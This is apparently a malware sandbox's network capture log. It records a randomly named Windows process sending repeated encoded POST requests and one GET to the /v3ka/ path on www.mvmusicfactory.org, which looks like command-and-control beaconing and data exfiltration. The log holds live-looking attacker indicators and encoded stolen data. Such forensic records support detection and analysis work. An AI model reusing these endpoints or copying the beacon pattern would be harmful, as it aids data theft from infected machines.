nf8dPP8p=htpeZlQ5V/ks6AI+6dlgyJaBbRMMtwISmsbQhSiT4nwxK6iHntBNobHVoNikBdJOn9XEjTZ+1SPEJxV9EbygFlvTK976jT8cdaaYl2PLErkQfqnL+pjsgvk/nndxQUPNF5+xR48KX5m08VLcCi9LutuqDnv94iWkEtruUyt+MTUfVzOvYkqx0P2P/WRyaq2TNw==
Feb 28, 2024 15:46:51.114979982 CET	299	IN	HTTP/1.1 405 Not Allowed date: Wed, 28 Feb 2024 14:46:50 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	50257	91.195.240.19	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:53.641835928 CET	1082	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.mvmusicfactory.org Origin: http://www.mvmusicfactory.org Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.mvmusicfactory.org/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 68 74 70 65 5a 6c 51 35 56 2f 6b 73 6f 51 34 2b 35 36 5a 67 31 70 61 47 55 78 4d 4d 6a 51 49 65 6d 74 6e 51 68 51 4f 44 35 53 59 78 4c 66 65 48 6d 76 70 4e 72 62 48 56 6d 74 6a 76 50 39 4a 48 6e 39 62 69 6a 58 64 2b 31 53 62 45 4b 69 64 39 54 62 79 68 4b 31 76 51 65 74 37 2f 79 44 38 57 64 61 47 71 6c 33 62 4c 45 59 77 51 4e 34 50 4c 36 37 4c 6a 6e 50 6b 35 6a 58 64 79 65 30 4f 4d 46 35 43 54 52 36 38 61 57 50 57 30 38 30 72 63 44 69 39 4b 31 4e 75 74 4c 48 75 68 32 53 33 64 4f 6f 33 48 45 46 56 7a 56 7a 45 63 55 69 33 72 65 7a 2b 65 75 4e 53 6a 30 32 73 64 65 5a 66 58 65 71 43 4a 35 51 76 4e 2f 75 65 66 55 6f 74 49 71 58 6e 6d 45 2b 75 52 49 4a 42 58 58 4a 65 44 76 63 35 4e 6e 70 77 38 2f 2f 56 66 6d 73 30 6b 38 58 53 43 71 49 64 39 71 36 34 6d 78 4b 4b 45 54 71 4b 47 75 58 67 55 57 52 6a 2f 47 51 77 70 67 4a 41 61 31 51 42 6b 4a 39 46 4e 38 33 55 37 4e 44 61 30 65 4b 38 65 41 52 30 55 70 75 37 4f 48 6a 32 38 79 53 4e 42 30 54 65 72 48 36 6c 43 30 6d 35 58 63 4c 79 43 4b 69 56 54 6b 62 52 56 2b 43 45 2f 57 78 6f 7a 78 4a 59 70 76 39 36 69 57 34 5a 48 68 49 79 6c 36 4d 4b 71 59 54 63 51 6f 37 52 37 63 5a 69 44 4f 58 64 63 7a 2b 79 59 75 4c 43 36 39 6a 4e 2f 39 31 4b 6d 71 57 54 6a 4a 70 6b 6d 54 44 70 75 6c 2b 6c 4a 6c 62 59 45 44 67 76 50 35 45 70 53 6d 68 6a 6e 4a 35 6e 6e 44 74 63 6b 32 31 4e 2f 52 7a 64 47 42 5a 6b 37 37 31 61 4a 51 31 36 49 74 71 54 37 51 76 31 58 70 69 67 4a 49 47 33 53 54 75 2f 67 42 6d 68 48 51 6e 4e 4e 61 33 69 53 5a 52 74 55 50 54 37 42 69 37 45 75 59 62 75 45 66 2f 52 4a 43 37 69 32 67 6f 6e 78 56 72 4e 6f 33 51 44 69 67 59 79 5a 57 58 42 74 53 48 55 3d Data Ascii: nf8dPP8p=htpeZlQ5V/ksoQ4+56Zg1paGUxMMjQIemtnQhQOD5SYxLfeHmvpNrbHVmtjvP9JHn9bijXd+1SbEKid9TbyhK1vQet7/yD8WdaGql3bLEYwQN4PL67LjnPk5jXdye0OMF5CTR68aWPW080rcDi9K1NutLHuh2S3dOo3HEFVzVzEcUi3rez+euNSj02sdeZfXeqCJ5QvN/uefUotIqXnmE+uRIJBXXJeDvc5Nnpw8//Vfms0k8XSCqId9q64mxKKETqKGuXgUWRj/GQwpgJAa1QBkJ9FN83U7NDa0eK8eAR0Upu7OHj28ySNB0TerH6lC0m5XcLyCKiVTkbRV+CE/WxozxJYpv96iW4ZHhIyl6MKqYTcQo7R7cZiDOXdcz+yYuLC69jN/91KmqWTjJpkmTDpul+lJlbYEDgvP5EpSmhjnJ5nnDtck21N/RzdGBZk771aJQ16ItqT7Qv1XpigJIG3STu/gBmhHQnNNa3iSZRtUPT7Bi7EuYbuEf/RJC7i2gonxVrNo3QDigYyZWXBtSHU=
Feb 28, 2024 15:46:53.944509983 CET	299	IN	HTTP/1.1 405 Not Allowed date: Wed, 28 Feb 2024 14:46:53 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	50258	91.195.240.19	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:56.472906113 CET	2572	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.mvmusicfactory.org Origin: http://www.mvmusicfactory.org Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.mvmusicfactory.org/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 68 74 70 65 5a 6c 51 35 56 2f 6b 73 6f 51 34 2b 35 36 5a 67 31 70 61 47 55 78 4d 4d 6a 51 49 65 6d 74 6e 51 68 51 4f 44 35 55 41 78 4b 74 6d 48 6d 4f 70 4e 71 62 48 56 75 4e 69 6f 50 39 49 48 6e 2b 72 75 6a 53 46 55 31 52 6a 45 50 6c 5a 39 51 74 47 68 42 6c 76 72 43 64 37 39 6a 54 38 34 64 61 62 74 6c 33 4f 38 45 72 73 51 66 72 58 4c 2b 4b 4c 73 6d 66 6b 2f 6a 58 64 2b 55 55 50 78 46 35 33 57 52 36 67 61 57 4a 4f 30 39 47 6a 63 42 7a 39 4b 74 74 75 75 46 6e 75 6c 34 79 32 30 4f 70 58 35 45 46 56 46 56 78 6f 63 55 67 2f 72 64 31 32 64 74 74 53 6a 35 57 73 65 50 70 69 63 65 71 76 4d 35 54 7a 4e 2f 74 75 66 58 49 74 49 68 57 6e 70 55 4f 76 61 4b 35 42 36 64 70 43 31 76 63 74 2f 6e 70 6b 38 2f 4c 31 66 30 72 55 6b 2b 32 53 43 30 34 64 6a 30 4b 35 34 37 71 4c 66 54 71 62 56 75 58 42 68 57 57 62 2f 48 78 38 70 77 39 55 64 38 51 42 69 46 64 45 5a 34 33 51 33 4e 44 4b 77 65 4b 39 56 41 55 51 55 70 65 72 4f 56 32 61 7a 6e 43 4d 6f 34 7a 66 7a 4f 61 5a 45 30 6d 6c 6c 63 4b 36 53 4b 68 5a 54 69 4c 52 56 6f 54 45 38 4e 52 6f 77 7a 4a 59 42 33 64 36 50 57 34 55 75 68 4a 32 66 36 34 36 71 5a 6e 34 51 2f 62 52 34 58 70 6a 45 59 6e 64 65 35 65 79 59 75 4c 4f 45 39 6a 52 2f 38 46 43 6d 72 6c 4c 6a 4d 36 63 6d 52 44 70 67 6c 2b 6c 63 6c 62 56 34 44 67 33 68 35 45 35 30 6d 6e 37 6e 49 72 50 6e 43 73 63 72 6d 31 4d 55 56 7a 64 52 63 4a 6f 67 37 31 48 4b 51 30 4b 79 74 61 76 37 52 73 4e 58 2b 79 67 4b 4e 6d 33 56 57 75 2f 32 4b 47 74 74 51 68 70 64 61 32 57 38 5a 57 5a 55 65 53 37 63 68 66 30 56 4e 36 79 66 51 4c 4e 58 4d 71 69 71 70 34 50 4f 59 4a 56 54 35 6e 62 70 6f 5a 2f 57 47 48 74 35 4f 58 6c 6a 39 4d 50 45 64 6b 7a 49 6c 58 54 4e 43 6b 64 32 67 79 6e 47 50 47 37 58 66 32 55 38 6d 6b 50 41 79 52 4f 43 44 54 73 32 67 38 59 73 72 46 42 74 62 45 33 31 79 31 66 65 6e 68 71 4e 46 64 2f 77 75 35 44 53 2b 32 42 63 63 6b 71 7a 79 45 69 68 33 72 6a 6b 78 4f 6e 76 76 74 5a 67 36 33 4e 37 57 6d 7a 2b 45 44 61 67 5a 33 65 57 32 38 35 4c 51 74 66 35 7a 74 4e 6b 4c 45 34 69 47 53 69 61 74 62 2f 74 71 71 78 30 67 6d 41 2b 57 73 73 69 59 59 6d 67 6c 37 65 4f 69 4f 50 72 37 74 64 37 54 51 65 6a 56 70 4e 45 47 6c 64 54 39 6f 48 55 31 36 45 4f 57 4b 55 69 39 2b 61 34 6e 4e 49 32 63 46 4a 5a 6f 5a 4a 74 46 6e 74 56 6a 45 72 44 49 6c 55 79 49 64 68 77 6d 77 4c 53 38 77 71 62 70 48 73 34 32 36 56 6f 52 45 4d 6b 76 55 4f 4d 37 53 2f 73 66 67 4b 5a 66 77 31 68 7a 57 74 45 78 38 33 56 41 69 42 6c 75 2f 44 6b 63 4d 59 59 74 4f 58 30 47 49 7a 74 4c 37 69 66 73 73 50 6f 2b 35 51 6f 4b 34 64 5a 74 41 75 2b 4c 71 7a 72 69 58 6c 4d 6b 4f 66 4c 2b 6c 2f 4a 33 4f 63 57 5a 37 58 48 45 54 32 6c 7a 31 39 6a 47 37 6c 6c 77 52 42 76 79 4b 72 6e 67 77 50 79 52 51 65 56 41 6c 4e 65 7a 6a 73 61 43 4c 34 30 2f 52 58 42 58 4c 76 58 30 73 56 42 30 41 71 36 33 61 33 71 48 4b 54 73 65 45 62 53 65 4f 42 4a 61 42 35 77 53 58 66 79 31 63 61 70 57 61 4f 35 70 58 65 35 55 65 2f 44 6d 36 53 32 75 61 75 35 6a 67 67 54 55 74 38 72 39 34 46 62 74 5a 78 51 72 74 62 4a 52 2b 78 37 4c 2b 43 6c 7a 48 37 47 47 67 65 71 56 2b 38 36 36 42 76 39 55 2f 77 37 57 64 2f 70 64 62 6d 47 35 52 6b 4f 56 47 6d 56 38 31 43 6a 38 4b 66 45 62 54 76 2f 57 65 6a 65 77 44 54 77 46 65 55 72 52 71 4c 64 69 48 38 50 75 68 71 6d 46 4f 66 53 79 41 35 2b 38 6e 35 48 57 77 6f 32 55 56 6f 45 61 63 75 32 70 43 4f 7a 79 59 54 6c 6d 5a 66 7a 77 69 51 56 71 4d 42 31 52 33 4e 6a 33 65 51 45 59 7a 6d 30 66 74 34 41 48 79 44 65 4e 66 63 45 45 37 49 56 6a 6a 73 54 46 7a 30 30 36 4f 44 6f 43 4c 62 71 78 44 42 66 66 4c 6e 33 45 5a 51 33 73 48 70 5a 68 76 54 44 6f 38 36 2b 45 32 58 5a 72 53 44 37 2f 76 4e 4f 59 6e 6e 39 35 77 38 52 6f 47 69 39 35 4f 79 2f 31 37 51 58 7a 4f 69 57 74 55 64 53 34 39 49 78 63 49 6b 63 5a 7a 53 34 4a 6f 74 66 72 36 7a 43 68 32 58 34 58 59 36 45 77 6a 71 6e 78 78 63 52 67 34 6d 42 4c 47 35 6a 48 6d 35 4d 55 59 39 65 68 7a 46 6a 36 6a 2b 52 4c 34 64 41 71 64 47 65 4f 66 56 52 62 47 73 4c 69 62 44 6d 55 66 4d 56 6e 35 79 72 4b 49 5a 38 7a 5a 4c 75 33 53 33 69 74 6b 7a 62 50 48 53 53 64 65 77 4b 79 4c 49 72 63 56 7a 79 2b 2f 63 2b 31 6a 6f 76 74 59 45 33 7a 69 48 71 64 55 Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:46:56.473031044 CET	10288	OUT	Data Raw: 5a 35 79 7a 78 64 5a 4a 71 34 61 56 50 62 6c 5a 46 6e 68 42 57 6a 57 56 6c 4b 47 55 45 65 49 44 68 53 71 38 72 68 74 31 46 31 50 55 52 57 45 68 42 2f 69 53 37 6f 4f 72 77 50 4d 35 6d 67 6e 79 4e 58 63 70 6d 71 37 49 77 78 58 55 68 57 52 4e 4f 69 Data Ascii: Z5yzxdZJq4aVPblZFnhBWjWVlKGUEeIDhSq8rht1F1PURWEhB/iS7oOrwPM5mgnyNXcpmq7IwxXUhWRNOiwDsksvVdlobgI2sxSsuOh63NwAuq7V5r7x9s01UoDGgvv16ZIxkp1h81Dn0ngs/pA0RqNqSZpAx8fHZWi+27Ic/unJqcuSC9qh2+qpnNzV3WS/mNb7eifH5vWOp+VA8l1cbIbkQrrSadlXNhKwr0ir2ChFaHihJzP
Feb 28, 2024 15:46:56.778229952 CET	1286	OUT	Data Raw: 7a 4e 2f 43 79 57 2f 59 70 7a 66 53 42 53 47 68 43 49 49 48 34 45 37 48 54 66 69 4e 31 6e 65 37 44 68 59 4d 36 77 76 5a 43 57 34 63 68 4f 79 62 42 6c 4f 54 30 5a 6c 63 68 44 6a 37 55 32 74 51 48 74 33 48 4e 47 74 77 68 51 6d 42 50 4f 38 49 49 73 Data Ascii: zN/CyW/YpzfSBSGhCIIH4E7HTfiN1ne7DhYM6wvZCW4chOybBlOT0ZlchDj7U2tQHt3HNGtwhQmBPO8IIs8ypuwW3QDY11XRkXNhi39lvcC0sbIwmgs3RBrCLg32y1pgd8DS4e0uQ+xFpsEJE7r6nbeMjfUGz0o4E41h6zA+H5Y6iY85XLTLzbDCPn2d7VTfonWZok0EYHavgX0ZxvHSccKcbOSy7JuW6BXPqHTpAOVgwUsvjDZ
Feb 28, 2024 15:46:56.778295040 CET	299	IN	HTTP/1.1 405 Not Allowed date: Wed, 28 Feb 2024 14:46:56 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
Feb 28, 2024 15:46:56.778410912 CET	11574	OUT	Data Raw: 47 37 54 47 6c 30 45 4b 69 44 75 48 33 38 42 45 55 31 74 6b 52 43 67 33 36 42 61 6f 6c 53 76 79 57 6f 6b 58 4c 54 6b 39 33 45 53 4a 76 66 61 35 66 65 30 5a 4e 6e 34 77 6f 53 49 61 71 6e 2b 4a 36 72 31 71 37 50 77 49 5a 59 31 54 78 7a 6a 34 56 66 Data Ascii: G7TGl0EKiDuH38BEU1tkRCg36BaolSvyWokXLTk93ESJvfa5fe0ZNn4woSIaqn+J6r1q7PwIZY1Txzj4VfKzWebeVUrbruvPHzDY5ea7ZPJKUbgmso9u66HtQZj6sPA1xxcONZeVEt746H2BbmZb/EIQYSPDdlt1YQPj/UN4tWz4iMJSqU6fvPYzs6BQtFMPf51yY6QmQhkDkNnc9L1H+mqo8qMB9i7b50dIAJeubaqUCIVHoRy
Feb 28, 2024 15:46:56.778578043 CET	7716	OUT	Data Raw: 4c 69 36 4c 33 53 55 2b 7a 69 61 51 71 30 76 4a 38 4e 4c 42 6c 4e 68 34 74 48 35 75 41 6c 44 4d 78 44 63 72 4b 63 65 4a 34 4f 52 35 35 7a 74 62 58 44 49 6c 50 70 44 7a 33 64 46 76 32 77 6e 52 32 69 59 55 79 48 6e 4e 4b 31 59 35 6b 5a 37 79 71 37 Data Ascii: Li6L3SU+ziaQq0vJ8NLBlNh4tH5uAlDMxDcrKceJ4OR55ztbXDIlPpDz3dFv2wnR2iYUyHnNK1Y5kZ7yq7MAIo5cHRuEbVgN0uPvZ4lIX/rSpguaZ2d0fySy1VN5166A98LaKO3aZXR0ymlIOLeOIq3Jl25sGUJZoMy0XPlBH0oHMYITZWAHdozPJN2AQ5S89uzp2VR8Ofj22RsyUOK3vWx+tni+wf9n+D2XYRJO6gpyx13XACq
Feb 28, 2024 15:46:56.779006958 CET	1286	OUT	Data Raw: 67 67 61 32 35 62 54 36 41 4a 77 4f 48 68 79 4b 4c 76 67 43 42 4f 42 35 70 79 4a 67 2f 54 68 46 36 56 67 71 4c 63 4c 34 63 36 77 53 62 54 70 4a 77 51 71 59 39 68 66 2f 61 31 68 79 67 68 79 43 72 30 73 68 31 64 69 49 6b 44 49 63 6c 54 4f 30 36 34 Data Ascii: gga25bT6AJwOHhyKLvgCBOB5pyJg/ThF6VgqLcL4c6wSbTpJwQqY9hf/a1hyghyCr0sh1diIkDIclTO064SePTYTRsaxQDi5k9Gq5Y6lXO4kjmiG81Z4p6vykgRuV+tiWZD0gIQSpYta074olYL6i/nHqpkt+seAU3ofXm+EsB5QuFlBn3WRGYkGp5JC6JTBIJ/3Qqi8QqIljieOOWqsnWDYBoQ81UOIPKEA7SwCYqOT4ZuaYGY
Feb 28, 2024 15:46:56.779176950 CET	3858	OUT	Data Raw: 59 4a 52 6e 72 70 65 75 6f 76 37 30 2b 36 69 61 6f 75 6d 39 70 4d 72 72 44 4c 4d 63 35 48 63 41 2b 65 53 30 65 6d 58 35 32 33 64 4a 73 64 73 32 45 65 55 43 79 55 30 33 59 4b 66 76 65 58 4b 69 70 36 6c 59 6c 54 34 5a 6c 41 36 4e 45 52 73 4d 2f 55 Data Ascii: YJRnrpeuov70+6iaoum9pMrrDLMc5HcA+eS0emX523dJsds2EeUCyU03YKfveXKip6lYlT4ZlA6NERsM/UctXfSQUGi87VJ6U3dvFsBRfOgefJcki26Mh5ERXqZJEGIBgzJziiCs+ogO7Rt5yY0c8CEF1croPSkoId+L7Ip9oQaFiPEEfm0g+jN70ktA4OqTg0fuxQzktgous1vIM5da3rKp6Q5EyiMDt/bOZ02020aYP8n7LJg
Feb 28, 2024 15:46:57.083277941 CET	2572	OUT	Data Raw: 50 4d 73 55 53 67 75 4d 71 74 6e 30 79 50 33 53 67 54 41 50 46 59 75 53 36 63 6d 64 78 62 77 76 6d 4a 43 50 66 62 67 78 6f 71 42 66 4c 72 55 66 30 46 63 47 7a 66 38 38 67 79 50 67 2b 52 44 42 45 34 2b 38 54 36 4b 55 2f 73 33 52 72 59 39 6f 34 37 Data Ascii: PMsUSguMqtn0yP3SgTAPFYuS6cmdxbwvmJCPfbgxoqBfLrUf0FcGzf88gyPg+RDBE4+8T6KU/s3RrY9o47vxa8Bm5QUEtU1OpctfvGGhX9mI/N+yH13W9S19JDfPu0vHZQcIb0Bvuw3sgTAlIy7JyYHv2/Pg+l52/cETktWz6QbJLD8UkTKmPuQNAU6klVfw8ME8F/KIb6W4QKeLjkuxPxIanyiTIHMdz5Wkw1wi7EAvcqOmIOp
Feb 28, 2024 15:46:57.083444118 CET	7716	OUT	Data Raw: 58 46 63 31 7a 47 38 78 50 56 69 43 4b 75 5a 52 64 70 65 6e 63 5a 46 57 61 46 4d 49 56 43 39 6e 76 30 69 4d 7a 61 70 4b 37 67 65 42 44 2f 42 42 69 6d 70 61 69 45 2b 6d 33 33 59 62 32 78 42 2f 69 35 2f 5a 4f 36 44 6b 6f 76 75 33 49 7a 66 6e 36 65 Data Ascii: XFc1zG8xPViCKuZRdpencZFWaFMIVC9nv0iMzapK7geBD/BBimpaiE+m33Yb2xB/i5/ZO6Dkovu3Izfn6ed6Gfr8ry9S+4rqYMvo2JlcKvO236/r/41f0WAWdvMsgrTd6QJgo/DaDnYwfmPPYEXB4EvZKrqAba1QpIGSS7018kZtC2i0NJcGNBVwDy83GMH++GsAdvhsWdl3YNUixsjpp/GNTnG/oIPSZmf4uUn4XGPySkCDiBv
Feb 28, 2024 15:46:57.083882093 CET	2572	OUT	Data Raw: 63 2f 2f 78 56 49 31 49 4c 76 43 58 31 35 59 76 49 72 59 67 35 34 74 6f 7a 31 44 48 55 6e 76 57 6f 41 38 47 4a 72 49 53 48 6d 4d 62 6d 68 44 70 30 56 6b 53 41 70 35 4f 47 37 52 4a 42 57 59 53 34 47 6c 33 6b 36 47 66 2b 33 75 2f 34 56 71 2b 30 67 Data Ascii: c//xVI1ILvCX15YvIrYg54toz1DHUnvWoA8GJrISHmMbmhDp0VkSAp5OG7RJBWYS4Gl3k6Gf+3u/4Vq+0gHatJ7MUvhWhcC1QBNYUTT7iZ2jK3Oiq6GYX57C2gMfT5u3mnJyV9/80+widss0spuRxcAarkXorqMMgx2vz0G6Ksgoh4yX1FJ/Wo4MxZlfYydvQCz2bObfkTgLVr8twIZb9o5k4SjlHLu3R05P0d4OfdkSmcutL9y
Feb 28, 2024 15:46:57.084048033 CET	2039	OUT	Data Raw: 2f 35 43 4f 54 6f 54 39 48 58 68 71 74 52 71 39 59 7a 6b 66 6c 38 36 48 6f 38 56 55 50 4c 34 41 32 51 53 66 47 58 43 36 39 75 39 36 4d 57 58 38 2f 7a 74 58 4c 72 52 79 65 76 63 63 68 75 63 68 72 63 6d 6c 6a 79 4e 73 39 30 34 70 38 56 55 6e 62 4e Data Ascii: /5COToT9HXhqtRq9Yzkfl86Ho8VUPL4A2QSfGXC69u96MWX8/ztXLrRyevcchuchrcmljyNs904p8VUnbNvE1lM+dJ0nN6Awal492+R9WGUNu8KXV7Y2cqIOhAddKU6qIRDEzAVzkqcdH4jnDUeermC1x3uucIUrmww1ZyrAYcTRxXRVOgDGXEc1hjkLHmVmzyjAvAfvGD4t66wsoF6XFRiA9969it3CTnZuivVixFXRGqbA1kh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	50259	91.195.240.19	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:59.299144030 CET	467	OUT	GET /v3ka/?nf8dPP8p=svB+aVl3D/Qs3yYpy+EYx4/lcj1+jj1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36HepX9QRc4Df86SJn8w=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.mvmusicfactory.org Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
